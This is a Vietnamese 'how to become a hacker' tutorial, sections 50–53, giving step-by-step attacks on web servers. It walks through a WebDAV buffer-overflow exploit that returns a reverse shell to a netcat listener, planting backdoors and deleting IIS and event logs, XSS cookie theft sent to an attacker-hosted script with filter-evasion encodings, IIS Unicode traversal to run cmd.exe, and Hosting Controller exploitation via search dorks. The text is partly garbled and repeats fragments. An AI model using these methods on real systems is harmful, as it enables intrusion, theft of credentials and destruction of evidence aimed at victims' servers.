Những hiểu biết cơ bản nhất để trở thành Hacker phần 4 50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet.
Những hiểu biết để trở thành Hacker phần trang đọc lần 50 ) Kỹ thuật hack server thông qua lỗi tràn đệm WebDAV : Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) tập hợp mở rộng cho giao thức HTTP dùng để cung cấp cách thức chuẩn cho việc biên tập quản lý file máy tính Internet Lỗi tràn đệm phát thành phần Windows 2000 sử dụng WebDAV cho phép kẻ công chiếm quyền điều khiển máy tính Chuẩn bị : Ngồi đồ nghề giới thiệu trước , bạn vào down thêm www32.brinkster.com/anhdenday/wb.zip extract để C:\ Khai thác : + Tìm trang Web dùng IIS 5.0 + Vào Dos , vào đặt NETCAT chế độ lắng nghe : C:\>nx -vv -l -p 53 listening on [any] 53 Ta để lắng nghe cổng 53 tường lửa ko chặn cổng + Mở thêm sổ DOS + Ta sử dụng WebDAV vừa down c:\wb.exe [padding=1,2,3 ] VD : C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] www.coromputer.net && undernet #coromputer Checking WebDav on 'xxx.xxx.xxx.xxx' FOUND exploiting ntdll.dll through WebDav [ret: 0x00100010] Connecting CONNECTED Sending evil request SENT Now if you are lucky you will get a shell + Nếu may mắn bạn lấy shell máy chủ IIS Nếu máy tính dùng để công kết sau bạn có shell : C:\>nc -vv -l -p 53 listening on [any] 53 connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp C:\WINNT\system32> < OK thành cơng rùi + Khi có shell việc ta sử dụng lệnh Unix để khai thác , sau up lên server vài backdoor , he he ( Sử dụng WinShell, Hack Defensed ok rùi ) + Sau làm xong ta xoá file log , để xác định file log ta thực câu truy vấn sau : C:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v LogFileDirectory ! REG.EXE VERSION 2.0 kết xuất link để ta xác định file log : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\ Parameters LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles He he , đường dẫn file log C:\WINNT\System32\LogFiles + Ta tạo file a.bat máy nạn nhân để thực việc xoá file log , ta đánh lệnh sau : C:\WINNT\system32>echo iisreset /stop >a.bat ' tạm dừng server IIS C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>a.bat ' xóa nhật kí IIS C:\WINNT\system32>echo iisreset /start >>a.bat ' khởi động lại IIS C:\WINNT\system32>echo ce >>a.bat ' xóa nhật kí Event Log C:\WINNT\system32>echo del a.bat >>a.bat ' xóa file a.bat + Sau ta dùng lệnh sau flie a.bat làm việc : C:\WINNT\system32>net time \xxx.xxx.xxx.xxx ' lấy thời gian máy chủ Nó cho kết VD sau : Current time at \xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM The command completed successfully Như thờI gian tạI máy chủ 15:00 , ta cho file a.bat làm việc sau phút lệnh sau : C:\WINNT\system32>at 15:05 a.bat Added a new job with job ID = Ta mặc đinh cho file a.bat tự động làm việc sau tuỳ vào thông số thời gian bạn đưa vào Ta thoát khỏi máy chủ lệnh : C:\WINNT\system32>exit ' đóng kết nối sent 207, rcvd 746 + Lúc admin có tài thánh ko biết có người thâm nhập _ Sau bạn muốn quay lại server ta đột nhập trực tiếp thơng qua backdoor bạn up lên _ Kèm theo file Wb.exe tơi để thêm file : + xoafilelog.exe : dùng để xoá file log server victim + wbscaniis.xpn : dùng để quét xem server victim có bị lỗi cho ta khai thác hay khơng , bạn tự tìm hiểu để sử dụng chúng 51 ) Lỗi CROSS SITE SCRIPTING cách khai thác : Giới thiệu : Lỗi XSS ( tên gọi Cross-Site Scripting ) nói nơm na hacker thơng qua lỗi để chèn code vào site hay link để chôm thông tin quan trọng từ nạn nhân, thông tin quan trọng cookie username + pass để vào tài khoản ngân hàng sau thơng tin gửi tới cho hacker Chuẩn bị : + Lấy đoạn code sau save lại thành file cookie.asp up lên host bạn có hỗ trợ asp ( brikster.com ) : Kiểm tra trang Web bị lỗi : + site có tất phần sau : search results, error messages , Web-form , chủ yếu lỗi XSS nằm phần , nói chung XSS xảy chỗ mà người dùng nhập liệu vào sau nhận + Cách tìm lỗi ta chia thành bước : Bước : Mở website cần kiểm tra Bước : Bắt đầu kiểm tra , định vị tìm kiếm login form gửi thông tin (nhập thông tin nhấn submit hay login hay ok ) , ví dụ nhập chữ "abc" chẳng hạn hay chữ Bước : Xác định khả site có bị lỗi XSS hay khơng cách xem thơng tin trả : Ví dụ bạn thấy : "Your search for 'abc' did not find any items" "Your search for 'abc' returned the following results" "User 'abc' is not valid" "Invalid login 'abc'" mà có dính tới chữ "abc" mà bạn nhập vào ban đầu 99% thằng bi XSS Bước : Chèn code thực vào nơi bị lỗi : chèn : alert('abc') vào ô ban nhấn SUBMIT Nếu sau bạn nhận popup có chữ "abc" thằng 100% bị dính XSS Nhưng xin ý , có trường hợp website bị dính XSS khơng xuất popup buộc lịng bạn phải VIEW SOURCES để xem Khi view sources nhớ kiếm dịng nàyalert('abc') , có XSS Một ví dụ khác thường gặp : Gọi http://sitebiloi.com site bị dính lỗi XSS ta tìm nơi bị lỗi : http://sitebiloi.com/?page= , nghĩa ta chèn code ADDRESS Tôi trình bày hết tình , mà bạn cần hiểu vấn đề bạn hiểu bị lỗi Khai thác : + Lấy lại ví dụ site bị XSS address , để lấy cookie nạn nhân ta làm : http://sitebiloi.com/index.asp?page=window.open("http:// địa trang Web ta vừa up file cookie asp lên /cookie.asp?cookie="+document.cookie) đoạn code chèn vào web page , trông vầy : Hello all! hello window.open("địa trang Web ta vừa up file cookie.asp lên /cookie.asp?cookie="+document.cookie) Với đoạn code trình duyệt thi hành đoạn code sau gửi tồn cookie tới cho bạn dạng file txt bạn việc mở file xem + Vậy gặp trường hợp nhà quản trị hạn chế xâm nhập cách lọc bỏ ký tự đặc biệt ta phải ? Các bạn thử cách thay ký tự mã đại diện VD : * Nếu "Bộ lọc" loại bỏ kí tự "" : Hacker dùng "\x3c" "\x3e" để thay bắt đầu chèn code với ') + ') + '\x3cscript src=http://hostbanupfile.com/cookie.asp?cookie="+document.cookie \x3e\x3c/script\x3e' Để tìm hiểu thêm mã đại diện bạn download : www32.brinkster.com/anhdenday/ascii.zip nghiên cứu + Biến đoạn code nguy hiểm thành lời giải (comment) : Ví dụ hacker nhập vào code bị chặn sau : Vượt qua dễ cách dùng thẻ đóng để đóng Nghĩa ta chèn vào : lúc đoạn lọc code ban đầu trở thành : lọc bị vơ hiệu hố cách nhanh chóng 52 ) Tìm hiểu lỗ hổng Unicode Microsoft IIS : Giới thiệu: Microsoft IIS phần mềm web server Nó chứa tất file website, làm chúng có hiệu lực cho người dùng internet Nhưng tất phần mềm khác, (đặc biệt Microsoft) có lỗ hỏng bảo mật Unicode IIS Microsoft, "không may" người quản trị lại khơng quan tâm đến việc cài đặt patch fix lỗi Trong hướng dẫn này, ta thảo luận cách mà lỗi hoạt động, Tại hoạt động Khi bạn viếng thăm website, địa file bạn xem giống sau: http://www.someserver.com/ Đây remote address web server, hiển thị address trình duyệt Bất kỳ truy cập internet Khi vào site này, web server đưa cho bạn file index, (index.html hay ) root folder web server Hầu hết root folder web server là: C:\inetpub\wwwroot Đây thư mục local web servers, nơi cất giữ tất trang website Vì bạn gõ địa sau: http://www.someserver.com/index.html Ở trình duyệt, web server đưa cho bạn local file nó: c:\inetpub\wwwroot\index.html Tơi hy vọng bạn không nhàm chán, việc quan trọng bạn phải hiểu khác địa local remote Bây giờ, xảy ta muốn di chuyển cặp thư mục lên web server? Ta muốn di chuyển từ c:\inetpub\wwwroot Đến c:\ làm nào? Bạn gõ: http://www.someserver.com/c:\ Chú thích Web server bắt đầu qua local c:\inetpub\wwwroot Đối với thư mục riêng, bạn khơng thể có : thư mục, đỗ vỡ bạn nhận thơng báo lỗi trình duyệt Tiếc q! khơng hoạt động Nếu quen với FTP, bạn biết lệnh DIRUP dùng để làm Lệnh để đến thư mục / / Nếu bạn thiết kế web hay mã html chắn bạn dùng nhiều Vì ta đặt lệnh lẫn nhau, giống sau http://www.someserver.com/ / / Và bắt đầu truy cập vào ổ đĩa c local server? Tốt, ta bắt đầu khai thác đây, người tạo IIS lại muốn tránh phiền phức, cách làm server từ chối loại yêu cầu này.Vì ta phải làm đây?Bạn có thử download file mà tên có khoảng trống chưa? Bạn có nhận thơng báo trình duyệt biến đổi khoảng trống thành %20 khơng? Hãy làm ví dụ Nếu bạn gõ trình duyệt: http://www.someserver.com/iis Unicode hole.txt Trình duyệt thay khoảng trống %20 : http://www.someserver.com/iis%20unicode%20hole.txt Và sau cho phép bạn download file Đó gì, trình duyệt lại phải làm thế? Máy tính khơng thể hiểu khoảng trống Đơn giản chúng không làm %20 Unicode cho ký tự ASCII mà ta hay gọi “khoảng trống” Ký tự ASCII ký tự mà ta thấy hình dùng máy tính Chỉ có Unicode cho ký tự ASCII Vì thế, bạn đưa khoảng trống vào trình duyệt, phải thay mà cho máy tính hiểu trước bắt đầu tìm kiếm Để tìm hiểu thêm ASCII bạn down : www32.brinkster.com/anhdenday/ascii.zip Từ trình duyệt biến đổi khoảng trống thành ký tự Unicode gửi chúng đến web server mà hiểu được, ta dùng ký tự Unicode để giải thích thứ ta muốn, web server hiểu chúng Không với khoảng trống Mà ta biến đổi lệnh DIRUP thành Unicode, gửi chúng đến server Ta cần biến đổi dấu gạch chéo (/) thành / / / Unicode Unicode / %5C Thật tuyệt, sau tơi cần gõ http://www.someserver.com/ %5C %5C/ tơi thấy host khơng? Khai thác đây, có vài lý khơng hoạt động Đầu tiên, bạn làm với server’s local c:\ Bạn cần vài thứ để đóng thư mục Web server không làm cho bạn Vì cần mở cmd.exe (dấu nhắc DOS) server Trong trình duyệt bạn! Nhưng quay lại vấn đề sau Thứ hai, server giải mã / %5C %5C/ Nó thành / / / mà lại bị hạn chế, sau từ chối u cầu Vì ta cần phải làm gì, hay mã hố Unicode mã hóa lần Có thể bạn khơng theo tơi bây giờ, tơi cố gắng giải thích lần Ta cần mã hoá ký tự chuỗi Unicode có Xem bảng hiểu COLOR=purple]ASCII UNICODE[/COLOR] % %25 %35 C %43 Vì ta mã hóa ký tự ASCII / %5C %5C/ Sang Unicode, ta %25%35%43 %25%35%43 Và server đọc chuỗi ký tự này, trở lạI / %5C %5C/ Đó khơng phải lệnh DIRUP bình thường, nên cho phép Nhưng có vài thứ cần biết Như đề cập trước, bạn kết nối đến web server, thư mục root mặc định wwwroot Thư mục trang site Nhưng có thư mục khác cho trang web yếu tố scripts Những thư mục có chứa file mà có nhiều thứ quan trọng web server Vì vận dụng server, ta cần làm từ thư mục mà ta có đặc quyền để làm Điều khơng khó; Tơi muốn bạn hiểu thêm /scripts/ vào cuối URL Rốt cuộc, ta thi hành lệnh dấu nhắc server’s local dos prompt, ta cần thi hành lệnh Ta muốn hiển thị c:\ ? Dễ thôi; ta cần làm vài thủ thuật khác bạn thường làm dấu nhắc dos Bắt đầu cmd.exe theo cách sau: cmd.exe?/c+ ? = Mọi thứ sau dòng đối số lệnh /c = Thi hành lệnh, sau đóng cmd.exe (để cho khơng chạy mãi) + = Thay cho khoảng trống Cuối cùng, toàn lệnh ráp lại sau: http://www.myserver.com/scripts/ %25%35%43 %25%35%43/win nt/system32/cmd.exe?/c+dir+c:\ Và bạn thấy c:\ servers bên trình duyệt Hehe? _ Chú thích: Có nhiều “lệnh” Unicode khác ta thi hành, khơng hoạt động (có thể server fix phần nào) thử áp dụng cách sau: /msadc/ %c0%af / %c0%af / %c0%af /winnt/system32/cmd.exe ?/c+dir+C:\ /_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/s ystem32/cmd.exe?/c+dir+C:\ …… 53 ) Kỹ thuật hack Hosting controller : Tìm site bị lỗi : vào Google.com đánh vào từ khoá sau : + copyright Hosting Controller + allinurl:/advadmin + allinurl:/admin Sau tìm ta thử xét trang Web có bị lỗi hay ko cách sử dụng đoạn code : http://www.victim.com/advwebadmin*hoac admin*/stats/statsbrowse.asp?filepath=c:\&Opt=3 ( Lệnh xem ổ đĩa victim ) www.victim.com/advwebadmin/autosignup/newwebadmin.asp ( Lệnh tạo free hosting ) Nếu lệnh thực hiên ta khai thác chúng , he he Cách khai thác : + Vì tạo hosting nên ta upload file vơ tư , bạn ý thử xem địa mà cất file ta vừa upload lên đâu ( cách nhìn vào statup ) + Tiếp theo ta chuyển file vào thư mục chứa trang chủ nạn nhân , theo mặc định nằm : C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\ ( Các bạn thay ổ C:\ D:\ , E:\ ) + Khi xác định xác địa rùi ta tìm đoạn script để làm giúp : http://[targethost]/admin/import/imp_rootdir.asp?result=1&www=C: \&ftp=C:\( đường dẫn đến thư mục web victim )&owwwPa th=C:\&oftpPath=C:\( đường dẫn đến thư mục ta vừa upload file ) + Các bạn test đường dẫn file up lên có xác khơng cách up lên file a.html , giả sử up lên nằm C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\admin\a.html ta test cách đánh đường dẫn URL : www.victim/admin[avdadmin]/a.html + Nếu xác cần up “Đồ nghề” lên xong ... Xem bảng hiểu COLOR=purple]ASCII UNICODE[/COLOR] % %25 %35 C %43 Vì ta mã hóa ký tự ASCII / %5C %5C/ Sang Unicode, ta %25%35 %43 %25%35 %43 Và server đọc chuỗi ký tự này, trở. .. tính hiểu trước bắt đầu tìm kiếm Để tìm hiểu thêm ASCII bạn down : www32.brinkster.com/anhdenday/ascii.zip Từ trình duyệt biến đổi khoảng trống thành ký tự Unicode gửi chúng đến web server mà hiểu. .. "" : Hacker dùng "x3c" "x3e" để thay bắt đầu chèn code với ') + ') + 'x3cscript src=http://hostbanupfile.com/cookie.asp?cookie="+document.cookie x3ex3c/scriptx3e' Để tìm hiểu thêm